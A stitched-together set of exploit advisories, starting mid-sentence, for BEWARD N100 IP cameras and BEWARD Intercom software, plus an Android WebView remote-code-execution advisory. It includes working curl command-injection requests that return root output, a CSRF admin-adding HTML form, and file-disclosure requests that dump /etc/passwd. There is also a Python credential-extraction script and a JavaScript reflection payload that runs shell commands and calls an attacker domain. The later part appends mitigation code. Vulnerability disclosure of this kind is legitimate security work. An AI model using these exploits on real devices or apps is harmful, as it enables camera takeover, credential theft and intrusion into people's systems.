necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: BEWARD N100 camera suffers from an unauthenticated and unauthorized
live RTSP video stream access.
Tested on: Boa/0.94.14rc21
Faraday ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5509
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5509.php
26.01.2019
--
http://TARGET/cgi-bin/view/image
BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The camera suffers from two authenticated command injection vulnerabilities.
The issues can be triggered when calling ServerName or TimeZone GET parameters
via the servertest page. This can be exploited to inject arbitrary system commands
and gain root remote code execution.
Tested on: Boa/0.94.14rc21
Faraday ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5512
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5512.php
26.01.2019
--
---------------------------
TimeZone command injection:
root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:15:53 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain
ntp update
0 OK
-----------------------------
ServerName command injection:
root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org|id||&TimeZone=03:00'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:22:11 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain
ntp update
0 OK
BEWARD N100 H.264 VGA IP Camera M2.1.6 CSRF Add Admin Exploit
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Boa/0.94.14rc21
Faraday ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5510
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5510.php
26.01.2019
--
<html>
<body>
<form action="http://TARGET/cgi-bin/admin/param">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="group" value="General.UserID" />
<input type="hidden" name="template" value="UserID" />
<input type="hidden" name="General.UserID.U.User" value="dGVzdDp0ZXN0MTIz,01000001" />
<input type="submit" value="Send" />
</form>
</body>
</html>
Base64(test:test123) + ,01000001 for A (Admin) = dGVzdDp0ZXN0MTIz,01000001
BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure
Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014
Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.
Desc: The camera suffers from an authenticated file disclosure vulnerability.
Input passed via the 'READ.filePath' parameter in the fileread script is not properly
verified before being used to read files. This can be exploited to disclose
the contents of arbitrary files via an absolute path or via the SendCGICMD API.
Tested on: Boa/0.94.14rc21
Faraday ARM Linux 2.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5511
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
26.01.2019
--
From the term:
--
root@ground:~# curl -H "Authorization: Basic YWRtaW46YWRtaW4=" http://TARGET/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
--
From the web console:
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/passwd")
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
--
SendCGICMD("cgi-bin/operator/fileread?READ.filePath=/etc/issue")
--
Welcome to \n (\m-\s-\r@\l/\b)
Faraday ARM Linux 2.6
Copyright (C) 2005 Faraday Corp. <www.faraday.com.tw>
Released under GNU GPL
--
wr: /usr/share/www/html
sp: /var/www/secret.passwd
bc: /etc/boa.conf
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# BEWARD Intercom 2.3.1 Credentials Disclosure
#
#
# Vendor: Beward R&D Co., Ltd
# Product web page: https://www.beward.net
# Affected version: 2.3.1.34471
# 2.3.0
# 2.2.11
# 2.2.10.5
# 2.2.9
# 2.2.8.9
# 2.2.7.4
#
# Note: For versions above 2.2.11: The application data directory, which
# stores logs, settings and the call records archive, was moved to ProgramData\BEWARD.
#
# New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
# Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
#
# Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time
# Video, Two-Way Audio. The software is used for BEWARD IP video door stations
# control.
#
# Desc: The application stores logs and sensitive information in an unencrypted
# binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to
# the current user session can successfully disclose plain-text credentials that
# can be used to bypass authentication to the affected IP camera and door station
# and bypass access control in place.
#
# Tested on: Microsoft Windows 10 Home (EN)
# Microsoft Windows 7 SP1 (EN)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5505
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php
#
#
#
#######################################################################
# Output:
# --------
# C:\> python beward_creds.py
# Username: admin
# Password: S3cr3tP4$$w0rd
# C:\>
#
#######################################################################
#
# 28.11.2018
#
import mmap
import os
import re
#
# For versions below 2.2.11:
#
# cuser = os.environ['USERNAME']
# dbfile = os.path.join(r'C:\Users', cuser,
#                       r'AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB')
#
#
# For versions 2.2.11 and above:
#
dbfile = r'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB'


def mapfile(filename):
    """Map the database file read-only; the record markers below are matched on raw bytes."""
    with open(filename, "rb") as fh:
        return mmap.mmap(fh.fileno(), os.path.getsize(filename), access=mmap.ACCESS_READ)


data = mapfile(dbfile)
# The byte sequences around each capture group delimit the stored credential fields in the FDB file
m = re.search(rb"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data)
print("Username: " + m.group(1).decode("latin-1"))
m = re.search(rb"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data)
print("Password: " + m.group(1).decode("latin-1"))
# Exploit Title: BestSafe Browser FREE NoAds - Remote Code Execution
# Date: 30/Jun/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com
# Software Link: See APK archive websites
# Screenshot: Refer to https://www.youtube.com/watch?v=VXNVzjsH0As
# Version: v3
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A
BestSafe Browser FREE NoAds - Remote Code Execution (No MITM Required!)
Version affected: v3
App Info: The Android application reviewed, according to the developer, is "secure" and is built for a better Google experience, and is essential for those who wish to protect their right to privacy.
External Links:
https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com
http://www.appsalesandsupport.com
Credits: MaXe (@InterN0T)
Special Thanks: no1special
Shouts: SubHacker and the rest of the awesome infosec community.
-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution attacks. This is caused by the following lines of code within the
\a1\bestsafebrowser\com\main.java file: (Lines 380 - 387)
public static String _activity_create(boolean z) throws Exception {
    mostCurrent._activity.RemoveAllViews();
    Common.ProgressDialogShow(mostCurrent.activityBA, "Attempting to access the Internet");
    Phone phone = new Phone();
    main a1_bestsafebrowser_com_main = mostCurrent;
    _googleurl = "http://www.comparison.net.au";
    mostCurrent._activity.LoadLayout("Start", mostCurrent.activityBA);
    ActivityWrapper activityWrapper = mostCurrent._activity;
and
Lines 634 - 641:
public static String _tr_tick() throws Exception {
    ...
    webViewExtras = mostCurrent._webviewextras1;
    WebViewExtras.clearCache((WebView) mostCurrent._webview1.getObject(), true);
    webViewExtras = mostCurrent._webviewextras1;
    WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "MyEventName");
    WebViewWrapper webViewWrapper = mostCurrent._webview1;
    main a1_bestsafebrowser_com_main2 = mostCurrent;
    webViewWrapper.LoadUrl(_googleurl);
    str = "";
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml, Line: 3)
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
If an attacker registers the domain "comparison.net.au" (it is currently NOT registered) and creates a DNS record for "www.comparison.net.au" then the attacker has full control over anyone who installs and runs this app. This vulnerability can be used to execute arbitrary Java code in the context of the application. The ".net.au" TLD requires slightly more validation during registration, in terms of a valid ABN, ACN or Trademark number. However, as this type of validation is fully automated and this type of information is public, an attacker can easily obtain another entity's ABN, ACN or Trademark number and use that to register a domain.
In addition to the above, in case someone has registered "comparison.net.au", then if an attacker performs a MITM attack against "www.comparison.net.au" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.comparison.net.au", then the attacker can also abuse this vulnerability.
The root cause of this vulnerability is addJavascriptInterface() on the WebView, which in older API versions can be used to execute arbitrary Java code: attacker-provided JavaScript can use reflection to reach public methods of the exposed object.
-:: Proof of Concept ::-
A successful attack that makes "www.comparison.net.au" serve the following code:
<script>
function execute(cmd){
return MyEventName.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a1.bestsafebrowser.com/owned']);
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
</script>
This application has been owned.
This makes the Android application create a new file named "owned" in its own data directory and, as a second example, play a video chosen by the attacker.
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
-:: Solution ::-
The Android app code should not use the addJavascriptInterface() function. Instead, the WebView should be created without a JavaScript bridge, as follows:
WebView webView = new WebView(this);
setContentView(webView);
...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
<manifest>
<uses-sdk android:minSdkVersion="17" />
...
</manifest>
The URL used ("http://www.comparison.net.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
Last but not least, the following code can be used to decide whether the JavaScript bridge should be exposed at all (below API 17 the bridge is left disabled):
private void exposeJsInterface(WebView webView, Object bridge) {
    // API 17 (JELLY_BEAN_MR1) is the first version that exposes only @JavascriptInterface-annotated methods
    if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR1) {
        Log.i(TAG, "addJavascriptInterface() bridge disabled.");
    } else {
        webView.addJavascriptInterface(bridge, "EVENT_NAME_HERE");
    }
}
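The following is an added example that puts the mitigations from this Solution section together in one Activity; it is not the vendor's code and is not taken from the advisory. It assumes the app only ever needs to load its bridged page from "www.comparison.net.au" over HTTPS (the class name SafeBrowserActivity, the bridge class EventBridge and the allowed host are assumptions for the example). The bridge object annotates its single exposed method with @JavascriptInterface, the bridge is not registered at all below API 17, and a WebViewClient refuses to load any URL that is not https:// on the expected host, so a page served from a hijacked plain-HTTP origin never gets a bridge to talk to.

```java
// Added example (not the vendor's code): a hardened WebView setup for the
// addJavascriptInterface() issue described above. Names are assumptions.
import android.annotation.SuppressLint;
import android.app.Activity;
import android.os.Build;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.net.URI;
import java.net.URISyntaxException;

public class SafeBrowserActivity extends Activity {
    private static final String TAG = "SafeBrowser";
    // Assumed: the only origin this app is meant to load the bridged page from.
    private static final String ALLOWED_HOST = "www.comparison.net.au";
    private static final String START_URL = "https://" + ALLOWED_HOST + "/";

    /** Bridge object. On API 17+ only methods annotated with @JavascriptInterface
     *  are reachable from page JavaScript; getClass() and other public methods are not. */
    public static class EventBridge {
        @JavascriptInterface
        public void onEvent(String name) {
            // Page input is untrusted: log its length only, never act on its content blindly.
            Log.i(TAG, "event from page, " + (name == null ? 0 : name.length()) + " chars");
        }
    }

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);
        webView.getSettings().setJavaScriptEnabled(true);

        // Keep navigation inside the expected HTTPS origin: returning true tells the
        // WebView not to load the URL, so anything off-origin is simply dropped.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                boolean allowed = isAllowed(url);
                if (!allowed) {
                    Log.w(TAG, "blocked navigation to off-origin or non-HTTPS URL");
                }
                return !allowed;
            }
        });

        exposeJsInterface(webView);
        webView.loadUrl(START_URL);
    }

    /** Same gate as the advisory suggests: no bridge at all below API 17. */
    private void exposeJsInterface(WebView webView) {
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR1) {
            Log.i(TAG, "addJavascriptInterface() bridge disabled on API " + Build.VERSION.SDK_INT);
        } else {
            webView.addJavascriptInterface(new EventBridge(), "MyEventName");
        }
    }

    /** Only https:// URLs on the allowed host may load in the bridged WebView. */
    static boolean isAllowed(String url) {
        try {
            URI uri = new URI(url);
            return "https".equalsIgnoreCase(uri.getScheme())
                    && ALLOWED_HOST.equalsIgnoreCase(uri.getHost());
        } catch (URISyntaxException e) {
            return false;
        }
    }
}
```

The host check complements, rather than replaces, the manifest change above: with minSdkVersion="17" the reflection path through getClass() is closed by the platform, and the HTTPS-only origin check is what stops a DNS hijack or rogue access point from substituting the page in the first place. Certificate errors are not overridden anywhere in the client, so the WebView's default behaviour of refusing an invalid certificate stays in effect.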
References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
Filename: BestSafe Browser FREE NoAds_vv3.apk
File size: 10,593,599 Bytes
md5: db5cef1b11df38ba7a560d147e6be3e6
sha1: dd08b1c8af4e8fb4b62c32aed3cb3544042774d6
sha256: bcf7d43f060d7e50d02a1f38abf6308961c7fd0aa0bac718e01c2ead28d7ea1d
App Name: BestSafe Browser FREE NoAds
Package Name: a1.bestsafebrowser.com
Package Version: v3
:)
=== EOF ===
Video demo:
https://www.youtube.com/watch?v=VXNVzjsH0As
FULL POC Archive:
https://mega.nz/#!saRkTCxD!p42DYndcH95iFViaLCmtUvt9Xwbtm1x9MiND--Xng38
The following is the timeline:
29 June 2017 - Vendor is notified.
29 June 2017 - Vendor pulls apps from app store and files privacy and trademark complaints with YouTube. Vendor does not intend to fix vulnerabilities.
30 June 2017 - All disclosure websites notified, including Exploit-DB.